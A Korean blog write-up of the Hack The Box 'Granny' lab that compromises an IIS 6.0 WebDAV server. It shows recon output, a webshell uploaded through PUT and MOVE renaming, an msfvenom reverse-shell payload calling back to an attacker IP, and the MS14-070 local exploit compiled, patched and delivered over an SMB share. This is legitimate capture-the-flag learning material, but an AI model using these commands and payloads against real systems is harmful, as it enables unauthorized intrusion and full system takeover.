Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- tuple
- 플라스크 애플리케이션 팩토리
- 레나튜토리얼.
- 멀티컨트롤오류
- flask설치
- 리버스엔지니어링
- 삼성클라우드오류
- L
- pe구조
- 파이썬
- 티스토리챌린지
- 리버스 엔지니어링
- 레나튜토리얼
- NMAP
- 숫자분리
- 포트스캐너
- 삼성노트동기화오류
- 리버싱
- flask
- 플라스크
- flask 구조
- AQ
- portswigger
- 오블완
- 클립보드간공유기능
- Python
- flask blueprint
- set
Archives
- Today
- Total
정보보안
Granny 본문
Target IP: 10.129.95.234
Attacker IP: 10.10.14.31
1. 정보수집
nmap
결과 > 80번 포트만 도출됨
$ nmap -sV -sC --open -Pn -n --max-retries 2 --min-rate 6000 -oA svsc 10.129.95.234
>
Nmap scan report for 10.129.95.234
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|\_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Wed, 23 Aug 2023 16:37:39 GMT
|\_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| http-methods:
|\_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|\_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows직접 접근 시 이상한 화면이 하나 나타남
gobuster
// 다음엔 아래 명령어 써보자
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u host -t 50 -x aspx,txt,html
$ gobuster dir -u http://10.129.95.234/ -w /usr/share/dirb/wordlists/common.txt -o gobuseter
>
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.95.234/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/21 12:52:47 Starting gobuster in directory enumeration mode
===============================================================
/_private (Status: 301) [Size: 155] [--> http://10.129.95.234/%5Fprivate/]
/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
/_vti_bin (Status: 301) [Size: 157] [--> http://10.129.95.234/%5Fvti%5Fbin/]
/_vti_bin/shtml.dll (Status: 401) [Size: 579]
/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
/aspnet_client (Status: 301) [Size: 160] [--> http://10.129.95.234/aspnet%5Fclient/]
/Images (Status: 301) [Size: 151] [--> http://10.129.95.234/Images/]
/images (Status: 301) [Size: 151] [--> http://10.129.95.234/images/]
Progress: 4614 / 4615 (99.98%)2. Exploit
frontpage Exploit
_vti_bin은 frontpage 관련 path이기에 searchsploit frontpage를 진행함.
아무래도 admin.dll, author.dll 200이 떴기 때문에 관련 취약점을 확인해보는 게 좋을 것 같으나 보이지 않음.
검색된 경로에 접근 시 diretorylisting 취약점이 있는 것을 확인할 수 있음.
이를 통해 여러가지 시도.. (ex. FrontPage .pwd File Credential Dump)를 해보았으나 나온 것이 없음.
또한 구글링도 잘 되지 않았음.
WebDAV Exploit
nmap 결과로 WebDAV가 나왔었음.
// WebDAV(Web Distributed Authoring and Versioning)는 사람들이 HTTP를 사용하여 웹 사이트를 만들고 수정할 수 있도록 설계된 HTTP 확장이다.
또한 PUT 및 MOVE와 같은 메소드가 표시되는 것을 발견했기에 파일을 업로드할 수 있는지 확인할 필요가 있음.
davtest라는 tool을 통해 업로드할 수 있는 파일 유형과 디렉터리를 생성할 수 있는지에 대한 여부를 확인해 봄.
$ davtest -url http://10.129.95.234
>
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.129.95.234
********************************************************
NOTE Random string for this session: gH6iEkdRHMLGake
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake
********************************************************
Sending test files
PUT aspx FAIL
PUT php SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.php
PUT html SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
PUT txt SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
PUT jsp SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jsp
PUT pl SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.pl
PUT jhtml SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jhtml
PUT cfm SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.cfm
PUT cgi FAIL
PUT asp FAIL
PUT shtml FAIL
********************************************************
Checking for test file execution
EXEC php FAIL
EXEC html SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
EXEC html FAIL
EXEC txt SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
EXEC txt FAIL
EXEC jsp FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.php
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jsp
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.pl
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jhtml
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.cfm
Executes: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
Executes: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt해당 사이트는 asp.net을 사용하나 FAIL됨.
curl을 이용하여 직접 업로드를 시도해봄. //실패함
$ echo 0xdf > test.txt
$ curl -X PUT http://10.129.95.234/df.txt -d @test.txt
$ curl http://10.129.95.234/df.txt
0xdf
$ curl -X PUT http://10.129.95.234/df.aspx -d @test.txt
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be displayed</h1>
You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed.
<hr>
<p>Please try the following:</p>
<ul>
<li>Contact the Web site administrator if you believe this directory should allow execute access.</li>
</ul>
<h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br>Internet Information Services (IIS)</h2>그러다 cadaver라는 unix 기반의 WebDAV CLIENT CLI 툴이 존재하는 것을 알고 시도해보았다.
링크: https://linux.die.net/man/1/cadaver
사용법에 move도 존재하기에 해당 툴을 이용하여 move로 txt를 aspx로 변경해보았다. //가능함.
$ cadaver http://10.129.95.234
dav:/> ls
>
Listing collection `/': succeeded.
Coll: DavTestDir_gH6iEkdRHMLGake 0 Aug 24 2023
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
df.txt 4 Aug 24 2023
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
dav:/> move df.txt df.aspx
>
Moving `/df.txt' to `/df.aspx': succeeded.
dav:/> ls
>
Listing collection `/': succeeded.
Coll: DavTestDir_gH6iEkdRHMLGake 0 Aug 24 2023
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
df.aspx 4 Aug 24 2023
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017.aspx 기반의 webshell을 txt로 업로드 후 cadaver 툴을 통해 txt -> aspx로 변환한다.
$ cp /usr/share/webshells/aspx/cmdasp.aspx ./granny/cmdasp.txt
$ curl -X PUT http://10.129.95.234/cmdasp.txt -d @cmdasp.txt
$ cadaver http://10.129.95.234/
>
dav:/> move cmdasp.txt cmdasp.aspx
Moving `/cmdasp.txt' to `/cmdasp.aspx': succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_gH6iEkdRHMLGake 0 Aug 24 2023
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
cmdasp.aspx 1358 Aug 24 2023
df.aspx 4 Aug 24 2023
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
dav:/>브라우저에서 해당 경로에 접속하면 웹쉘이 실행되는 것을 확인할 수 있다.
물론 CURL을 통해서도 MOVE를 수행할 수 있다.
REVERSE SHELL을 업로드해보자.
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.35 LPORT=4444 -f aspx -o shell.aspx
>
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2740 bytes
Saved as: shell.aspx
$ mv shell.aspx shell.txt
$ curl -X PUT http://10.129.95.234/shell.txt --data-binary @shell.txt
$ curl -X MOVE --header 'Destination:http://10.129.95.234/shell.aspx' 'http://10.129.95.234/shell.txt'
$ curl http://10.129.95.234/shell.aspx
Privilege Escalation
아래와 같이 권한 상승이 필요한 것을 알 수 있다.
Windows Exploit Suggester을 이용하여 잠재적으로 권한 상승을 허용할 수 있는 Windows 대상 시스템에서 누락된 패치를 식별해본다.
// systeminfo는 접속된 리버스쉘에서 복사해서 가져오자.
// 결과가 356개 나옴....;ㅅ;
$ git clone https://github.com/Pwnistry/Windows-Exploit-Suggester-python3
$ ./windows-exploit-suggester.py --update
$ pip install xlrd --upgrade$ ./windows-exploit-suggester.py --database 2023-08-21-mssb.xlsx --systeminfo sysinfo.txt
[*]
initiating winsploit version 3.4...
[*]
database file detected as xlsx based on extension
[*]
attempting to read from the systeminfo input file
[+]
systeminfo input file read successfully (utf-8)
[*]
querying database file for potential vulnerabilities
[*]
comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*]
there are now 356 remaining vulns
[+]
[E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+]
windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M]
MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]
https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]
https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E]
MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]
https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E]
MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]
http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E]
MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]
http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M]
MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]
https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]
http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]
http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]
http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]
http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]
http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M]
MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]
http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]
http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
...권한 상승만 필터링 함.
$ ./windows-exploit-suggester.py --database 2023-08-21-mssb.xlsx --systeminfo sysinfo.txt | grep -E "Elevation|Escalation"
>
MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Importantms14-070이 os가 동일하여 될 거 같은 느낌이다. 간다 너로.
ms14-070
$ searchsploit ms14-070
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070) | windows/local/35936.py
Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) | windows/local/37755.c
------------------------------------------------------------------------------------------------------------------ ---------------------------------searchsploit 시 c와 python exploit 파일이 등장했으나 그대신 37755.exe 파일을 아래 주소에서 다운로드 받았음.
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-070/MS14-070
타겟의 웹사이트는 업로드 취약점이 있기 때문에 exploit 파일을 powershell을 통해 다운받아 실행하려 했으나,
타겟은 powershell을 가지고 있지 않았다..
KALI와의 smb 공유를 통해 exe를 복사 후 실행을 시키기로 한다.
$ sudo /usr/share/doc/python3-impacket/examples/smbserver.py share .
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
\[_\] Config file parsed
\[_\] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
\[_\] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
\[_\] Config file parsed
\[_\] Config file parsed
\[_\] Config file parsed
$ copy \\10.10.14.11\share\37755.exe C:\WINDOWS\Temp\37755.exe하지만 기쁨은 잠시뿐.. hang에 걸려 버린다..
하하..하하하 다시 37755.c를 이용하도록 한다. 히히..
컴파일을 진행하자..
$ i686-w64-mingw32-gcc-win32 37755.c -o exploit.exe -lws2\_32
\>
37755.c:78:15: error: conflicting types for ‘NTSTATUS’; have ‘DWORD’ {aka ‘long unsigned int’}
78 | typedef DWORD NTSTATUS;
| ^
~~
In file included from /usr/share/mingw-w64/include/wincrypt.h:846,
from /usr/share/mingw-w64/include/windows.h:95,
from 37755.c:57:
/usr/share/mingw-w64/include/bcrypt.h:27:16: note: previous declaration of ‘NTSTATUS’ with type ‘NTSTATUS’ {aka ‘long int’}
27 | typedef LONG NTSTATUS,\*PNTSTATUS;
| ^~
너무나 즐겁다 역시 한 번에 될리가 없다!
typedef DWORD NTSTATUS; 를 아래와 같이 변경한다.
typedef _Return_type_success_(return >= 0) LONG NTSTATUS;
재컴파일 시 에러없이 생성이 된 것을 확인할 수 있다.
다시 smb를 통해 exploit.exe를 타겟에게 전달한다.
exploit.exe를 실행시킨다.
하지만 또 에러 발생.. hang 걸리고 아무것도 하지 못한다.
인터넷을 뒤져보니 아래와 같은 천사가 있었다.
https://forum.hackthebox.com/t/granny-privesc-ms14-070-without-meterpreter/404/4
천사는 익스플로잇 코드 중 일부를 아래와 같이 변경하라 했다.
BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
startupInformation->cb = sizeof (STARTUPINFO);
startupInformation->lpDesktop = "WinSta0\\Default";
ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
LPTSTR lpComspec;
lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
GetEnvironmentVariable("comspec", lpComspec, 1024);
return CreateProcess (
lpComspec,
NULL,
NULL,
NULL,
TRUE,
0,
NULL,
NULL,
&startupInformation[0],
&processInformation[0]
);
}변경 후 다시 컴파일을 진행하고 smb 공유를 통해 컴파일한 파일을 전송 및 실행한다.
$ i686-w64-mingw32-gcc-win32 37755.c -o exploit1.exe -lws2_32
$ sudo /usr/share/doc/python3-impacket/examples/smbserver.py share .
$ rlwrap nc -lvnp 4444
$ copy \\10.10.14.11\share\exploit1.exe C:\WINDOWS\Temp\exploit1.exe
$ exploit1.exe
인간승리
FLAG
총정리:
PUT과 MOVE 메서드를 통해 확장자 변조를 하여 리버스셸을 실행할 수 있었다.
LOCAL Privilege esclation은 OS 버전 취약점(Windows Server 2003 SP2, ms14-070)을 이용한 Exploit을 진행하였다.
Target은 powershell이 없어 SMB 공유(KALI)를 통해 Exploit 파일을 전달했다.
인터넷에 만들어져 있는 exploit exe 파일은 hang이 걸려 사용하지 못했으며(사용법도 없음)
c로 만들어진 파일은 에러가 발생하여 코드 수정이 필요했고, 실행 시 또 hang이 걸려 두 번에 걸친 코드 수정이 필요했다.
컴파일 명령어: i686-w64-mingw32-gcc-win32 37755.c -o exploit1.exe -lws2_32
SMB 공유 오픈 : sudo /usr/share/doc/python3-impacket/examples/smbserver.py share .
gobuster 다른 파일 사용해보자: gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u host -t 50 -x aspx,txt,html
'HTB/Windows' Related Articles
more
